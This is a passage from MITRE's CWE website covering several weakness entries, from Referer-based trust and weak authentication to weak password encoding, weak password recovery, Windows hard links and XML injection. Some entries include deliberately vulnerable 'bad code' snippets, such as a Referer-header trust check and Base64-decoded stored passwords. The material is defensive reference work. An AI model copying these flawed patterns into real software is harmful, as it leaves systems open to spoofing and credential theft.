weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code samples check a packet's referer in order to decide whether or not an inbound request is from a trusted host. (bad code)
Example Language: C++
String trustedReferer = "http://www.example.com/"
while(true){ n = read(newsock, buffer, BUFSIZE); }requestPacket = processPacket(buffer, n); if (requestPacket.referer == trustedReferer){ openNewSecureSession(requestPacket); }(bad code)
Example Language: Java
boolean processConnectionRequest(HttpServletRequest request){
String referer = request.getHeader("referer") }String trustedReferer = "http://www.example.com/" if(referer.equals(trustedReferer)){ openPrivilegedConnection(request); }return true; else{ sendPrivilegeError(request); }return false; These examples check if a request is from a trusted referer before responding to a request, but the code only verifies the referer name as stored in the request packet. An attacker can spoof the referer, thus impersonating a trusted client.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-657: Violation of Secure Design Principles
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This can introduce resultant weaknesses or make it easier for developers to introduce related weaknesses during implementation. Because code is centered around design, it can be resource-intensive to fix design problems.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Switches may revert their functionality to that of hubs when the table used to map ARP information to the switch interface overflows, such as when under a spoofing attack. This results in traffic being broadcast to an eavesdropper, instead of being sent only on the relevant switch interface. To mitigate this type of problem, the developer could limit the number of ARP entries that can be recorded for a given switch interface, while other interfaces may keep functioning normally. Configuration options can be provided on the appropriate actions to be taken in case of a detected failure, but safe defaults should be used. Example 2 The IPSEC specification is complex, which resulted in bugs, partial implementations, and incompatibilities between vendors. Example 3 When executable library files are used on web servers, which is common in PHP applications, the developer might perform an access check in any user-facing executable, and omit the access check from the library file itself. By directly requesting the library file (CWE-425), an attacker can bypass this access check. Example 4 Single sign-on technology is intended to make it easier for users to access multiple resources or domains without having to authenticate each time. While this is highly convenient for the user and attempts to address problems with psychological acceptability, it also means that a compromise of a user's credentials can provide immediate access to all other resources or domains. Example 5 The design of TCP relies on the secrecy of Initial Sequence Numbers (ISNs), as originally covered in CVE-1999-0077 [REF-542]. If ISNs can be guessed (due to predictability, CWE-330) or sniffed (due to lack of encryption during transmission, CWE-312), then an attacker can hijack or spoof connections. Many TCP implementations have had variations of this problem over the years, including CVE-2004-0641, CVE-2002-1463, CVE-2001-0751, CVE-2001-0328, CVE-2001-0288, CVE-2001-0163, CVE-2001-0162, CVE-2000-0916, and CVE-2000-0328.
Example 6 The "SweynTooth" vulnerabilities in Bluetooth Low Energy (BLE) software development kits (SDK) were found to affect multiple Bluetooth System-on-Chip (SoC) manufacturers. These SoCs were used by many products such as medical devices, Smart Home devices, wearables, and other IoT devices. [REF-1314] [REF-1315] Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1390: Weak Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses an authentication mechanism to restrict access to specific users or identities, but the mechanism does not sufficiently prove that the claimed identity is correct.
Attackers may be able to bypass weak authentication faster and/or with less effort than expected. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple OT products used weak authentication. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-261: Weak Encoding for Password
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
Password management issues occur when a password is stored in plaintext in an application's properties or configuration file. A programmer can attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code reads a password from a properties file and uses the password to connect to a database. (bad code)
Example Language: Java
...
Properties prop = new Properties(); prop.load(new FileInputStream("config.properties")); String password = Base64.decode(prop.getProperty("password")); DriverManager.getConnection(url, usr, password); ... This code will run successfully, but anyone with access to config.properties can read the value of password and easily determine that the value has been base 64 encoded. If a devious employee has access to this information, they can use it to break into the system. Example 2 The following code reads a password from the registry and uses the password to create a new network credential. (bad code)
Example Language: C#
...
string value = regKey.GetValue(passKey).ToString(); byte[] decVal = Convert.FromBase64String(value); NetworkCredential netCred = newNetworkCredential(username,decVal.toString(),domain); ... This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other The "crypt" family of functions uses weak cryptographic algorithms and should be avoided. It may be present in some projects for compatibility.
CWE-640: Weak Password Recovery Mechanism for Forgotten Password
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.
It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account. Weak password recovery schemes completely undermine a strong password authentication scheme. This weakness may be that the security question is too easy to guess or find an answer to (e.g. because the question is too common, or the answers can be found using social media). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
This entry might be reclassified as a category or "loose composite," since it lists multiple specific errors that can make the mechanism weak. However, under view 1000, it could be a weakness under protection mechanism failure, although it is different from most PMF issues since it is related to a feature that is designed to bypass a protection mechanism (specifically, the lack of knowledge of a password).
Maintenance
This entry probably needs to be split; see extended description.
CWE-521: Weak Password Requirements
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-65: Windows Hard Link
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.
Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. AUTOEXEC.BAT). When the process opens the file, the attacker can assume the privileges of that process, or prevent the program from accurately processing data.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-91: XML Injection (aka Blind XPath Injection)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.
Within XML, special elements could include reserved words or characters such as "<", ">", """, and "&", which could then be used to add new data or modify XML syntax.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Theoretical
In vulnerability theory terms, this is a representation-specific case of a Data/Directive Boundary Error.
Research Gap
Under-reported. This is likely found regularly by third party code auditors, but there are very few publicly reported examples.
Maintenance
The description for this entry is generally applicable to XML, but the name includes "blind XPath injection" which is more closely associated with CWE-643. Therefore this entry might need to be deprecated or converted to a general category - although injection into raw XML is not covered by CWE-643 or CWE-652.
More information is available — Please edit the custom filter or select a different filter. |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Use of the Common Weakness Enumeration (CWE™) and the associated references from this website are subject to the Terms of Use. CWE is sponsored by the U.S. Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and managed by the Homeland Security Systems Engineering and Development Institute (HSSEDI) which is operated by The MITRE Corporation (MITRE). Copyright © 2006–2025, The MITRE Corporation. CWE, CWSS, CWRAF, and the CWE logo are trademarks of The MITRE Corporation. |
||

